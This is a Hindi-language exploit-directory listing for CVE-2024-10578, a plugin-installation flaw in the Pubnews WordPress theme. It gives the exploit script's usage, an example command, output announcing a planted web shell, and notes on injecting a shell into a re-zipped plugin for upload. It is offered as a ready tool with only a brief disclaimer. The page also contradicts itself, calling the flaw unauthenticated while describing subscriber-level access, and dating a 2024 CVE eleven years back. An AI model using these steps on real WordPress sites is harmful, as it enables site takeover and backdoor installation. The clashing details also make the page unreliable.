Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/nxploited/cve-2024-10578
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubnxploited/cve-2024-10578

CVE-2024-10578

Pubnews <= 1.0.7 - बिना प्रमाणीकरण के मनमाना प्लगइन इंस्टॉलेशन

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-10578: Pubnews <= 1.0.7 - अप्रमाणित मनमाना प्लगइन इंस्टॉलेशन

विवरण

WordPress के लिए Pubnews थीम, pubnews_importer_plugin_action_for_notice() फ़ंक्शन पर क्षमता जांच की कमी के कारण, 1.0.7 तक (और सहित) सभी संस्करणों में अनधिकृत मनमाना प्लगइन इंस्टॉलेशन के प्रति संवेदनशील है। यह भेद्यता Subscriber-स्तर या उससे ऊपर की पहुँच वाले प्रमाणित हमलावरों को मनमाना प्लगइन्स इंस्टॉल करने की अनुमति देती है, जिनका उपयोग अन्य भेद्यताओं का शोषण करने के लिए किया जा सकता है।

CWE

  • CWE-434: खतरनाक प्रकार की फ़ाइल का अप्रतिबंधित अपलोड

CVSS

  • स्कोर: 8.8 (उच्च)
  • संस्करण: 3.1
  • वेक्टर स्ट्रिंग: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

एक्सप्लॉइट स्क्रिप्ट: wordpress_exploit.py

यह स्क्रिप्ट Pubnews थीम में भेद्यता का शोषण करके प्रदान किए गए URL से एक मनमाना प्लगइन इंस्टॉल करती है। प्लगइन में एक दुर्भावनापूर्ण शेल या कोई अन्य पेलोड हो सकता है।

उपयोग

root@kitploit:~

CVE-2024-10578.py [-h] -u URL -un USERNAME -p PASSWORD -url_zip PLUGIN_URL

Pubnews <= 1.0.7 - Unauthenticated Arbitrary Plugin Installation # By Nxploited, Khaled alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         The URL of the WordPress site
  -un, --username USERNAME
                        The username for WordPress login
  -p, --password PASSWORD
                        The password for WordPress login
  -url_zip, --plugin_url PLUGIN_URL
                        The plugin URL to install (must be a zip file with the shell injected inside)

उदाहरण

root@kitploit:~
python 
CVE-2024-10578.py -u http://target/wordpress -un admin -p admin -url_zip http://target/shell1.zip

आउटपुट

root@kitploit:~
[+] Logged in successfully.
[+] Admin _wpnonce extracted: 6bf22371ab
[+] Plugin installed successfully.
[+] Plugin extracted. You can find the shell here: /wp-content/plugins/shell1/

महत्वपूर्ण नोट्स

  • प्लगइन URL एक ज़िप फ़ाइल का सीधा लिंक होना चाहिए जिसमें शेल या कोई अन्य पेलोड मौजूद हो।
  • यह अनुशंसित है कि किसी मौजूदा WordPress प्लगइन का उपयोग करें, उसमें शेल इंजेक्ट करें, और फिर उसे दोबारा ज़िप करें। शोषण के लिए इस ज़िप फ़ाइल को एक सीधे लिंक पर अपलोड करें।

⚠️ अस्वीकरण

यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है। लेखक इस स्क्रिप्ट के अवैध गतिविधियों में उपयोग का समर्थन नहीं करता। इसका जिम्मेदारी से उपयोग करें और केवल उन्हीं सिस्टम पर उपयोग करें जिनकी जाँच करने की आपको स्पष्ट अनुमति हो।

द्वारा: Nxploited | Khaled Alenazi

टूल डाउनलोड करें